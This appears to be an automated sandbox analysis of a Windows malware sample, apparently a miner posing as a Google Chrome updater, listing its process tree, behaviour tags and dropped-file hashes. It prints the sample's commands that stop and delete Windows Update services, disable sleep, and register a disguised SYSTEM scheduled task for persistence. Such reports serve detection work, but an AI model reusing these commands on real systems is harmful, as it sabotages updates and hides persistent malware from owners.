C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4660
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3424
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2252
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4092
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4828
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:696
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:2644
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4388
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3448
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2136
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4668
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4036
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:4384
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#myhhgfd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1008
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe kfleahquehi2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4132 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
PID:2492
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Modifies data under HKEY_USERS
PID:3840
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qjosysdnolwwzbsc GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqwn6vckAqS7SwZBHmWfSXaoYPV5nF5hTjq2epH65KwNo9lXjxaX7KyBDQ9wTlDmUyUC+oUs02ckKl1ssjG3/geDSTbyqoDAGDRxVlNzsfIHK9jTKb41kkt5n5KU3N0Quo/PGA9zlisO7lVe8SE+rkGyntU1fmaH3axIruRYdl/jwpgiyjxwLGtc6v6EqhF8Y//wqc4DLjxoML3CNLKlunEmrYb4h2eim5E/v5ur7MeJhAgSNi+g/oyV2b3B6L2NmJWK44j/1PmtzJdtTTjUwWRqlta/ahTq/+dpQPXgFJnSzXSrMxkKo/DX1UjiEO6EZkutvT8vEDAT5kxHv9ZLCKlKkJ3uqdAFqloYaVbbwogLJFee/cR8Mos6dW3oZ4LvaMe4O0ga8CszjkHqad5ywliajU1jFFEA4in7m8Y2aWveg=2⤵
- Suspicious behavior: EnumeratesProcesses
PID:344
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4860
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.7MB
MD557bc38aa4830968ccfd83ddf9417c93f
SHA131b3dc9a13f1a9fffc2eeb272494bf60fc385338
SHA256f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919
SHA51226f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7
-
Filesize
6.7MB
MD557bc38aa4830968ccfd83ddf9417c93f
SHA131b3dc9a13f1a9fffc2eeb272494bf60fc385338
SHA256f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919
SHA51226f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD5544ab21b3b347554805bb74b622b58b7
SHA1ea6a2e9e49fe839adb8d115e0f11a836aa229fa1
SHA256543e4393a73f4ef802cc146cea67ee314afe4573a93f8f4163ed99ed5364f6c8
SHA51256123592bd294a5e19771112e09143065e0bd5636e0d94f662dab86bb5dbca8dd19052269f67414be0edd26068feb620cd1bb27563b392e3053566a45de41a83
-
Filesize
1KB
MD5ef411b98999dda40218b3c7bda8063df
SHA1737a5c040d01933971af69a6bf3e336e33626295
SHA2568af1449baf0e05c2c386911f6a828c14de7db7440df0217f612126bd9e021485
SHA512246711be2135933e7d163702dd1b4bb1240d60a0e7917564102ef69b3b7718f234696c03644403a262ba7d1b8cea073bd6ed5781c4f6902f2ffa3aae9e67ec84
-
Filesize
2KB
MD54ac8a26e2cee1347880edccb47ab30ea
SHA1a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5811d351aabd7b708fef7683cf5e29e15
SHA106fd89e5a575f45d411cf4b3a2d277e642e73dbb
SHA2560915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18
SHA512702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5302a7c179ef577c237c5418fb770fd27
SHA1343ef00d1357a8d2ff6e1143541a8a29435ed30c
SHA2569e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f
SHA512f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699